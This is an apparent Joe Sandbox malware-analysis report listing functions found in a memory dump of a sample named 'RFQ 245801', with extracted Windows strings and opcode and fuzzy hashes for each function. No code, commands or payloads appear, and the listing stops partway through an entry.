                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                                                  • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                  • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                                                                                                  • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                  • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                                                                                                  Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                                                                  • kLsE, xrefs: 01720540
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                  • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                  • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                                                                                                  Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                  • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                  • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                                                                                                  Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                  • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                                                                  • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                                                                                                                  Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                  • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                                                                                                  • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                                                                                                                                                  Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                  • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                                                                  • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                                                                                                                  Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                  • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                                                                  • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                                                                                                                  Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                  • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                                                                                                  • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                                                                                                  • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                                                                                                                                                  Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .mui
                                                                                                                                                                                  • API String ID: 0-1199573805
                                                                                                                                                                                  • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                                                                                                  • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                                                                                                                                                  Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                  • Opcode ID: 9e988999298b5872e3532fc86e0d6180abb8a0ffcf10ff3d1fea543350a1109d
                                                                                                                                                                                  • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e988999298b5872e3532fc86e0d6180abb8a0ffcf10ff3d1fea543350a1109d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                                                                                                                                                                  Function 0179C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                                                  • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                                                                                                  • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                                                                                                                                                                  • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                                                                                                                                                                  Function 017B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                  • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                                                                                                  • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                                                                                                                                                                  • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                                                                                                  • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                                                                                                                                                                  Function 0179CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: BinaryName
                                                                                                                                                                                  • API String ID: 0-215506332
                                                                                                                                                                                  • Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                                                                                                  • Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                                                                                                  • Instruction Fuzzy Hash: F3310336900515AFEF16DB58D845E7FFB74EB80760F014169A905AB291D7309E08EBE0
                                                                                                                                                                                  Function 017A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                  • API String ID: 0-702105204
                                                                                                                                                                                  • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                  • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                                                                                                  • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                                                                                                                                                                  Function 017C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                  • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                                                                                                  • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                                                                                                                                                                  Function 017B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                  • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                                                                                                  • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                                                                                                                                                                  Function 01732840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                  • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                                                                                                                                                  • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                                                                                                                                                                  Function 017CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                  • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                                                                                                                                                  Function 01726A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                  • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                                                                                                                                                  Function 01744A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                  • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                                                                                                  Function 017B892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                  • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                                                                                                  • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                                                                                                  Function 017265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                  • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                                                                                                  Function 01718397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                  • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                                                                                                  Function 017A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                  • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                                                                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                                                                                                                                                  Function 01730535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
